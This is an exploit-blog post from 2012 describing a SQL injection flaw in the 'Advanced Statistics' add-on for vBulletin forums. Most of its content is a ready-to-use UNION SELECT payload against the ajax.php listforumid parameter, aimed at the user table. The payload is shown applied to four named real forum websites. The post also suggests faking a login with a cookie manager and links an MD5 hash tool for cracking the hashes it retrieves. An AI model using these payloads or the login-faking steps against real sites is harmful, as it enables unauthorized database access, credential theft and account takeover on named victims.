#####################################################################################################
->Vulnerability
#####################################################################################################
->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,
user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager to fake login.
[+] Md5 Hash Generator -> http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno_okyo & all VNH Group members.
##########################################################################################
New Post
Home
»
Exploit
»
SQL Injection
»
vBulletin
» ChangUonDyU - Advanced Statistics SQL injection Vulnerability
Thursday, October 25, 2012
Related Posts
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site ScriptingSoftware: WP e-CommerceSoftware La...Read more
Yii Framework - Search SQL Injection Vulnerability
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability# Google Dork: No Dork# Date: 20/...Read more
vBulletin vBay <=1.1.9 Error-Based SQL Injection
#!/usr/bin/env python -W ignore::DeprecationWarning """ VBay <= 1.1.9 - Remote Error based S...Read more
SQL Injection - Useful Functions - Tutorial
Here are some useful function that you can use to speed up your injection and/or evade some WAFs.If ...Read more
How to SQL Inject with SQLMAP on BackTrack 5
vBulletin 3.0 Private Message HTML Injection Vulnerability
source: http://www.securityfocus.com/bid/7594/infoA vulnerability has been reported in vBulletin 3....Read more
Subscribe to:
Post Comments (Atom)
0 nhận xét:
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.